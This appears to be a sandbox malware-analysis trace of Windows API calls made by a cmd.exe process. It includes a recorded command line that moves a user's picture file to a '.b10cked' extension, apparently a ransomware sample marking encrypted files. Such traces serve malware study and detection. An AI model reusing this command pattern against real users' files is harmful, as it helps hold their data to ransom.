"\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 17177 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 17178 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 17179 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 17268 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 17269 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 17270 start_va = 
0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 17271 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 17272 start_va = 0x430000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 17273 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 17274 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 17275 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 17276 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 17277 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 17278 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 17279 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename 
= "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 17280 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 17281 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 17282 start_va = 0x2d0000 end_va = 0x397fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 17283 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 17284 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 17285 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 17286 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 17287 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 17288 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 17289 start_va = 0x530000 end_va = 0x630fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 17290 start_va = 0x640000 end_va = 0x123ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 
17291 start_va = 0x1240000 end_va = 0x13a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001240000" filename = "" Thread: id = 252 os_tid = 0x9cc [0144.908] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cf8d4 | out: lpSystemTimeAsFileTime=0x2cf8d4*(dwLowDateTime=0x904e7aa0, dwHighDateTime=0x1d440a9)) [0144.908] GetCurrentProcessId () returned 0x88c [0144.908] GetCurrentThreadId () returned 0x9cc [0144.908] GetTickCount () returned 0x2d2f7 [0144.908] QueryPerformanceCounter (in: lpPerformanceCount=0x2cf8cc | out: lpPerformanceCount=0x2cf8cc*=20169692202) returned 1 [0144.908] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0144.908] __set_app_type (_Type=0x1) [0144.908] __p__fmode () returned 0x76b331f4 [0144.909] __p__commode () returned 0x76b331fc [0144.909] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0144.909] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0144.909] GetCurrentThreadId () returned 0x9cc [0144.909] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9cc) returned 0x38 [0144.909] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0144.909] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0144.909] SetThreadUILanguage (LangId=0x0) returned 0x409 [0144.909] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0144.909] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cf864 | out: phkResult=0x2cf864*=0x0) returned 0x2 [0144.909] VirtualQuery (in: lpAddress=0x2cf89b, lpBuffer=0x2cf834, dwLength=0x1c | out: lpBuffer=0x2cf834*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, 
RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.910] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cf834, dwLength=0x1c | out: lpBuffer=0x2cf834*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0144.910] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cf834, dwLength=0x1c | out: lpBuffer=0x2cf834*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0144.910] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cf834, dwLength=0x1c | out: lpBuffer=0x2cf834*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.910] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cf834, dwLength=0x1c | out: lpBuffer=0x2cf834*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0144.910] GetConsoleOutputCP () returned 0x1b5 [0144.910] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0144.910] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0144.910] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.910] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0144.910] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.910] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0144.910] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.910] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0144.911] _get_osfhandle (_FileHandle=0) returned 0x3 [0144.911] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0144.911] _get_osfhandle (_FileHandle=0) returned 0x3 [0144.911] SetConsoleMode (hConsoleHandle=0x3, 
dwMode=0x1a7) returned 1 [0144.911] GetEnvironmentStringsW () returned 0x4401d8* [0144.911] FreeEnvironmentStringsW (penv=0x4401d8) returned 1 [0144.911] GetEnvironmentStringsW () returned 0x4401d8* [0144.911] FreeEnvironmentStringsW (penv=0x4401d8) returned 1 [0144.911] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce7d4 | out: phkResult=0x2ce7d4*=0x40) returned 0x0 [0144.912] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce7dc, lpData=0x2ce7e0, lpcbData=0x2ce7d8*=0x1000 | out: lpType=0x2ce7dc*=0x0, lpData=0x2ce7e0*=0x0, lpcbData=0x2ce7d8*=0x1000) returned 0x2 [0144.912] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce7dc, lpData=0x2ce7e0, lpcbData=0x2ce7d8*=0x1000 | out: lpType=0x2ce7dc*=0x4, lpData=0x2ce7e0*=0x1, lpcbData=0x2ce7d8*=0x4) returned 0x0 [0144.912] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce7dc, lpData=0x2ce7e0, lpcbData=0x2ce7d8*=0x1000 | out: lpType=0x2ce7dc*=0x0, lpData=0x2ce7e0*=0x1, lpcbData=0x2ce7d8*=0x1000) returned 0x2 [0144.912] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce7dc, lpData=0x2ce7e0, lpcbData=0x2ce7d8*=0x1000 | out: lpType=0x2ce7dc*=0x4, lpData=0x2ce7e0*=0x0, lpcbData=0x2ce7d8*=0x4) returned 0x0 [0144.912] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce7dc, lpData=0x2ce7e0, lpcbData=0x2ce7d8*=0x1000 | out: lpType=0x2ce7dc*=0x4, lpData=0x2ce7e0*=0x40, lpcbData=0x2ce7d8*=0x4) returned 0x0 [0144.912] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce7dc, lpData=0x2ce7e0, lpcbData=0x2ce7d8*=0x1000 | out: lpType=0x2ce7dc*=0x4, lpData=0x2ce7e0*=0x40, lpcbData=0x2ce7d8*=0x4) returned 0x0 [0144.912] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, 
lpType=0x2ce7dc, lpData=0x2ce7e0, lpcbData=0x2ce7d8*=0x1000 | out: lpType=0x2ce7dc*=0x0, lpData=0x2ce7e0*=0x40, lpcbData=0x2ce7d8*=0x1000) returned 0x2 [0144.912] RegCloseKey (hKey=0x40) returned 0x0 [0144.912] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce7d4 | out: phkResult=0x2ce7d4*=0x40) returned 0x0 [0144.912] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce7dc, lpData=0x2ce7e0, lpcbData=0x2ce7d8*=0x1000 | out: lpType=0x2ce7dc*=0x0, lpData=0x2ce7e0*=0x40, lpcbData=0x2ce7d8*=0x1000) returned 0x2 [0144.912] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce7dc, lpData=0x2ce7e0, lpcbData=0x2ce7d8*=0x1000 | out: lpType=0x2ce7dc*=0x4, lpData=0x2ce7e0*=0x1, lpcbData=0x2ce7d8*=0x4) returned 0x0 [0144.912] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce7dc, lpData=0x2ce7e0, lpcbData=0x2ce7d8*=0x1000 | out: lpType=0x2ce7dc*=0x0, lpData=0x2ce7e0*=0x1, lpcbData=0x2ce7d8*=0x1000) returned 0x2 [0144.912] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce7dc, lpData=0x2ce7e0, lpcbData=0x2ce7d8*=0x1000 | out: lpType=0x2ce7dc*=0x4, lpData=0x2ce7e0*=0x0, lpcbData=0x2ce7d8*=0x4) returned 0x0 [0144.912] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce7dc, lpData=0x2ce7e0, lpcbData=0x2ce7d8*=0x1000 | out: lpType=0x2ce7dc*=0x4, lpData=0x2ce7e0*=0x9, lpcbData=0x2ce7d8*=0x4) returned 0x0 [0144.912] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce7dc, lpData=0x2ce7e0, lpcbData=0x2ce7d8*=0x1000 | out: lpType=0x2ce7dc*=0x4, lpData=0x2ce7e0*=0x9, lpcbData=0x2ce7d8*=0x4) returned 0x0 [0144.912] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce7dc, lpData=0x2ce7e0, lpcbData=0x2ce7d8*=0x1000 | out: 
lpType=0x2ce7dc*=0x0, lpData=0x2ce7e0*=0x9, lpcbData=0x2ce7d8*=0x1000) returned 0x2 [0144.912] RegCloseKey (hKey=0x40) returned 0x0 [0144.912] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886373 [0144.912] srand (_Seed=0x5b886373) [0144.912] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\U8SH0R~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\u8sH0rXco9.jpg.b10cked\"" [0144.912] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\U8SH0R~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\u8sH0rXco9.jpg.b10cked\"" [0144.913] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0144.913] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x441938, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0144.913] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0144.913] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0144.913] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0144.913] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0144.913] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0144.913] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0144.913] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0144.913] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0144.913] _wcsicmp (_String1="PROMPT", _String2="TIME") returned 
-4 [0144.913] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0144.913] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0144.913] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0144.914] GetEnvironmentStringsW () returned 0x442328* [0144.914] FreeEnvironmentStringsW (penv=0x442328) returned 1 [0144.914] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0144.914] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0144.914] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0144.914] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0144.914] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0144.914] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0144.914] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0144.914] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0144.914] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0144.914] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0144.914] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf5a0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0144.914] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf5a0, lpFilePart=0x2cf59c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf59c*="Desktop") returned 0x18 [0144.914] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0144.914] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf31c | out: lpFindFileData=0x2cf31c) returned 0x440068 [0144.914] FindClose (in: hFindFile=0x440068 | out: hFindFile=0x440068) returned 1 [0144.915] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf31c 
| out: lpFindFileData=0x2cf31c) returned 0x440068 [0144.915] FindClose (in: hFindFile=0x440068 | out: hFindFile=0x440068) returned 1 [0144.915] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf31c | out: lpFindFileData=0x2cf31c) returned 0x440068 [0144.915] FindClose (in: hFindFile=0x440068 | out: hFindFile=0x440068) returned 1 [0144.915] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0144.915] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0144.915] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0144.915] GetEnvironmentStringsW () returned 0x442b48* [0144.915] FreeEnvironmentStringsW (penv=0x442b48) returned 1 [0144.915] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0144.916] GetConsoleOutputCP () returned 0x1b5 [0144.916] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0144.916] GetUserDefaultLCID () returned 0x409 [0144.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0144.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf6e0, cchData=128 | out: lpLCData="0") returned 2 [0144.916] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf6e0, cchData=128 | out: lpLCData="0") returned 2 [0144.917] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf6e0, cchData=128 | out: lpLCData="1") returned 2 [0144.917] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0144.917] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0144.917] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | 
out: lpLCData="Tue") returned 4 [0144.917] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0144.917] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0144.917] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0144.917] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0144.917] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0144.917] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0144.917] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0144.917] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0144.918] GetConsoleTitleW (in: lpConsoleTitle=0x430918, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0144.918] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0144.918] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0144.918] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0144.918] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0144.919] _wcsicmp (_String1="move", _String2=")") returned 68 [0144.919] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0144.919] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0144.919] _wcsicmp (_String1="IF", _String2="move") returned -4 [0144.919] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0144.919] _wcsicmp (_String1="REM", _String2="move") returned 5 [0144.919] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0144.924] GetConsoleTitleW (in: 
lpConsoleTitle=0x2cf3d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0145.042] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0145.042] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0145.042] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0145.042] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0145.042] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0145.042] _wcsicmp (_String1="move", _String2="CD") returned 10 [0145.043] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0145.043] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0145.043] _wcsicmp (_String1="move", _String2="REN") returned -5 [0145.043] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0145.043] _wcsicmp (_String1="move", _String2="SET") returned -6 [0145.043] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0145.043] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0145.043] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0145.043] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0145.043] _wcsicmp (_String1="move", _String2="MD") returned 11 [0145.043] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0145.043] _wcsicmp (_String1="move", _String2="RD") returned -5 [0145.043] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0145.043] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0145.043] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0145.043] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0145.043] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0145.043] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0145.043] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0145.043] _wcsicmp (_String1="move", _String2="VER") returned -9 [0145.043] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0145.043] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0145.043] _wcsicmp 
(_String1="move", _String2="SETLOCAL") returned -6 [0145.043] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0145.043] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0145.043] _wcsicmp (_String1="move", _String2="START") returned -6 [0145.043] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0145.043] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0145.043] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0145.044] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0145.044] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0145.044] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2cf194, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2cf18c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2cf18c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0145.045] _wcsnicmp 
(_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0145.045] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", 